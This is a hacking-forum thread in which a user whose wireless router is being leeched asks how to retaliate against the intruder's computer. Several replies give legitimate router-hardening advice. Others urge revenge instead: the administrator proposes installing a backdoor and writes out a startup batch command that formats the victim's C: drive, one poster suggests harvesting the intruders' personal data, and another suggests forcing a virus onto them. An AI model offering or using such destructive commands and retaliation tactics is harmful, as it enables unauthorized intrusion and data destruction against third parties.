someone is useing my router

No explicit questions like "how do I hack xxx.com" please!
rougeish

someone is useing my router

Post by rougeish »

sorry to bother you guys but av looked all over the forums and cant find a giude.

some one has managed to get on my WAN i wasent botherd at first but there d/l non stop and leaching all my bandwith so before i change the password and tha i wanted to go on there computer and leave them a little prezi if you catch my drift :twisted:

i am using a belkin54g router they was showing up in the network window but now there just showing up on the router setup utility page on the DHCP Client List

i donno if thats enough info but i donno what else to put am very new at this

any help is much abliged thanx for your time

Big-E
Administrator
Administrator

Post by Big-E »

Well, it depends really what you want to do. If he is on your network, make sure you don't have any shares open - better yet, setup a firewall and block all access with the exception of your own local puters, and external solicited traffic.

With that being said, you can get shell access to the computer and install a backdoor to the system so you can gain access whenever you want.

There are some other malicious things you can do. BUT take this into consideration.

Chances are, it's a neighbor who is not very tech savy and ended up connecting to your wireless AP by accident - do you not have your connection encrypted? If not, do so immediately.

IF that is the case, and it`s secured and they hacked into your connection..then fair game. I would personally write a nice little batch script which executes on start up to format his whole system

something like

Code: Select all

echo y | format C: /FS:NTFS /q
should do the trick.

Lyecdevf
cyber Idi Amin
cyber Idi Amin

Post by Lyecdevf »

Well if you could provide us with more info we could be of more use. For one you did not mention if you have wireless enabeled.

How long have you been using this router? Maybe it is time to upgrade to a new firmware!

Set up a strong password! Some thing that would be hard to crack!

How many computers connect to this router? If it is just you you should set up static LAN IP addresses and disabel DHCP.

If you need any more help I can help PM me. I can help you set up firewall rules and resolve other security issues!
We will either find a way, or make one.
- Hannibal

bad_brain
Site Owner
Site Owner

Post by bad_brain »

disconnect the router from the internet, then go to the settings:
1. disable remote administration
2. set new (and strong!) passwords
3. use encrypted connections
4. limit access to the IPs of your computers (better MAC addresses if possible)
5. if you use the default name (like "Belkin router") change it, this only attracts wardrivers because it usually means the AP is not well configured

:wink:

n3rd
Staff Member
Staff Member

Post by n3rd »

bad_brain wrote: 5. if you use the default name (like "Belkin router") change it, this only attracts wardrivers because it usually means the AP is not well configured

:wink:
Unless you want to backfuck the hackers again. using their connection to gain their personal data XD
[img]http://img580.imageshack.us/img580/8009/userbar2k.png[/img]

jasonxxx102
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!

Post by jasonxxx102 »

Download a program netsupport... You can view all the computers that are using your network... you can do amusing things with it also you can shutdown log off blank screen and other fun things but if you really want to get this person you can also send the person a file and take control of thier comp so that it forces them 2 open the file... and if by any chance that file just happened to be a virus well then they r screwed...

DNR
Digital Mercenary
Digital Mercenary

more nfo on wifi router distance

Post by DNR »

What BB said is most logical.

I also point out that wardrivers have to be within certain distance to the wifi router (AP). I doubt they have a cantenna set-up to target you at long range, so that means its people on a laptop within 150 to 300 feet max. The average range of a AP was 80 to 100 in the city due to all the cement walls, and interference. If you live in a condo or apartment, those walls could allow all of your neighbors to logon to your AP.

You need to set up the WPA/WEP option.
<added>
For protection of your computer, use the host-based firewall, zone alarm, or nortons, what ever. The biggest threat is your DNS router can be change to run through their malicious network.

DNR
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.

rougeish

Post by rougeish »

i have been using the router for about a year now, there is new faimwear for it but i have downloaded it about ten times and it wont install think its time i got a new one to be honist.

there are three laptops, two wii's and two xbox 360's on the network

whats shell access?

i had a wep password of jst random letters and numbers, so they must of known what they was doing

floodhound2
∑lectronic counselor
∑lectronic counselor

Post by floodhound2 »

For starters it is a LAN not a WAN :lol:

Next thing I would do is reset the user name and password. This is done by un-plugging the thing from the wall and inserting an unfolded paper clip into the little hole located usually in the read of the router [wait for several seconds up to a minute]. Next log on using factory password and set up a secure wireless connection and remembering to make a harder log on password.

Just my input !
₣£ΘΘĐĦΘŮŇĐ

Lyecdevf
cyber Idi Amin
cyber Idi Amin

Post by Lyecdevf »

Here is a nice tutorial I wrote on the subject. I have been talking about writing one for months and here it is:

http://www.suck-o.com/modules.php?name= ... 1454#31454
We will either find a way, or make one.
- Hannibal